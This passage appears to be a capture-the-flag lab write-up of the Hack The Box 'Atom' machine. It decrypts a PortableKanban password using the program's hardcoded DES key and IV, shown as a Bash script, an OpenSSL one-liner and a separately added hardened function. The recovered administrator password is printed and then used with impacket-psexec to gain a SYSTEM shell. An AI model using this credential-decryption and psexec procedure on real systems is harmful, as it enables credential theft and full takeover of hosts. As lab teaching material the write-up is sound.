PortableKanban
As the automated scanning proved ineffective, manual enumeration of the target system became necessary. During this process I came across an intriguing discovery: an unconventional third-party task-management program called PortableKanban. The program appears to be a purely end-user application, yet it turned out to be configured with the target's Redis server instance as its backend, and its configuration file also included an encrypted password string. The obsolete program was later confirmed to be vulnerable to offline decryption.
Obtaining the CLEARTEXT password for the Redis server from its configuration file granted access to the instance at last. The Redis server contained what appears to be the credential string of the administrator user, along with the IDENTICAL encrypted string found in the PortableKanban configuration file. This evidential discovery solidified the speculation: if the administrator user is indeed the system user and the password is reused, privilege escalation can be achieved by decrypting the encrypted password string that supposedly belongs to the administrator user.
Decryption
Looking at one of the available Python scripts for decryption, the PortableKanban program uses the outdated DES algorithm. The key and initialization vector (IV) needed for decryption are explicitly provided in the script, as the program was reverse-engineered by the script's original author and those secrets were extracted from it.
Since there is no such file as PortableKanban.pk3, but the encrypted password string is readily available, I can just write a script of my own.
Bash Scripting
┌──(kali㉿kali)-[~/archive/htb/labs/atom]
└─$ cat decrypt.sh
#!/bin/bash
# Decrypt the PortableKanban password string with the DES key and IV
# recovered from the program (replace these values with the ones you have)
encrypted_password_base64='Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi'
# openssl expects the 8-byte key and IV as 16 hex characters
to_Hex(){
    echo -n "$1" | xxd -p -l 8
}
key=$(to_Hex 7ly6UznJ)
iv=$(to_Hex XuVUm5fR)
# Decode the base64 string and pipe the raw ciphertext straight into OpenSSL;
# holding the binary bytes in a shell variable first can silently drop some of them
decrypted_password=$(echo "$encrypted_password_base64" | base64 -d | openssl enc -des -d -K "$key" -iv "$iv") || exit 1
echo "Decrypted Password: $decrypted_password"
It's a simple Bash script that does the same thing as the Python script.
Execution
┌──(kali㉿kali)-[~/archive/htb/labs/atom]
└─$ ./decrypt.sh
Decrypted Password: kidvscat_admin_@123
┌──(kali㉿kali)-[~/archive/htb/labs/atom]
└─$ echo 'Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi' | base64 -d | openssl enc -des -d -K $(echo 7ly6UznJ | xxd -p -l 8) -iv $(echo XuVUm5fR | xxd -p -l 8)
kidvscat_admin_@123
Executing the script outputs the supposed password of the administrator user: kidvscat_admin_@123
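As an added example (not part of the original write-up), the same DES-CBC decryption wrapped in a Bash function with the checks the one-liner skips: a key or IV that is not exactly 8 bytes, a ciphertext that is not a whole number of DES blocks, and a failed decrypt are all reported instead of producing garbage, and because OpenSSL 3 moved single DES into its legacy provider, the function retries with that provider loaded. The function name pk_decrypt is my own; the key and IV default to the values quoted above.

```shell
#!/bin/bash
# Added example, not code from the write-up: decrypt a PortableKanban password string.
# Usage: pk_decrypt <base64-ciphertext> [key] [iv]
#   prints the plaintext and returns 0, or prints a reason on stderr and returns 1.
pk_decrypt() {
    local b64="$1" key="${2:-7ly6UznJ}" iv="${3:-XuVUm5fR}"
    local keyhex ivhex raw_len plain
    # openssl wants the 8-byte key/IV as 16 hex characters (od is used instead of xxd
    # so the function only needs coreutils)
    keyhex=$(printf '%s' "$key" | head -c 8 | od -An -tx1 | tr -d ' \n')
    ivhex=$(printf '%s' "$iv" | head -c 8 | od -An -tx1 | tr -d ' \n')
    if [ "${#keyhex}" -ne 16 ] || [ "${#ivhex}" -ne 16 ]; then
        echo "key and IV must each be exactly 8 bytes" >&2
        return 1
    fi
    # DES-CBC ciphertext is a whole number of 8-byte blocks; reject anything else early
    raw_len=$(printf '%s' "$b64" | base64 -d 2>/dev/null | wc -c | tr -d ' ')
    if [ "$raw_len" -eq 0 ] || [ $((raw_len % 8)) -ne 0 ]; then
        echo "ciphertext is not valid base64 of whole DES blocks" >&2
        return 1
    fi
    # Pipe the raw bytes straight into openssl. A wrong key/IV or corrupt data shows up
    # as a PKCS#7 padding failure ("bad decrypt", non-zero exit). On OpenSSL 3 the default
    # provider no longer offers single DES, so retry with the legacy provider loaded.
    plain=$(printf '%s' "$b64" | base64 -d | openssl enc -des-cbc -d -K "$keyhex" -iv "$ivhex" 2>/dev/null) \
      || plain=$(printf '%s' "$b64" | base64 -d | openssl enc -des-cbc -d -K "$keyhex" -iv "$ivhex" \
                 -provider legacy -provider default 2>/dev/null) \
      || { echo "decryption failed (wrong key/IV, corrupt data, or DES unavailable)" >&2; return 1; }
    printf '%s\n' "$plain"
}

# Stand-alone run: decrypt the string from the PortableKanban configuration file
if [ "${BASH_SOURCE[0]}" = "$0" ]; then
    pk_decrypt 'Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi'
fi
```

The same function can be pointed at the string found in Redis, which should yield the identical plaintext if it is indeed the same encrypted password.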
┌──(kali㉿kali)-[~/archive/htb/labs/atom]
└─$ impacket-psexec administrator@$IP
Impacket v0.11.0 - Copyright 2023 Fortra
Password: kidvscat_admin_@123
[*] Requesting shares on 10.10.10.237.....
[*] Found writable share ADMIN$
[*] Uploading file NxTAidol.exe
[*] Opening SVCManager on 10.10.10.237.....
[*] Creating service RyCe on 10.10.10.237.....
[*] Starting service RyCe.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.19042.906]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32> whoami
nt authority\system
C:\WINDOWS\system32> hostname
ATOM
C:\WINDOWS\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : dead:beef::a113:8872:d58a:1862
Temporary IPv6 Address. . . . . . : dead:beef::c8c5:32a:bb32:10b9
Link-local IPv6 Address . . . . . : fe80::a113:8872:d58a:1862%6
IPv4 Address. . . . . . . . . . . : 10.10.10.237
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%6
10.10.10.2
It indeed belongs to the administrator user.
System Level Compromise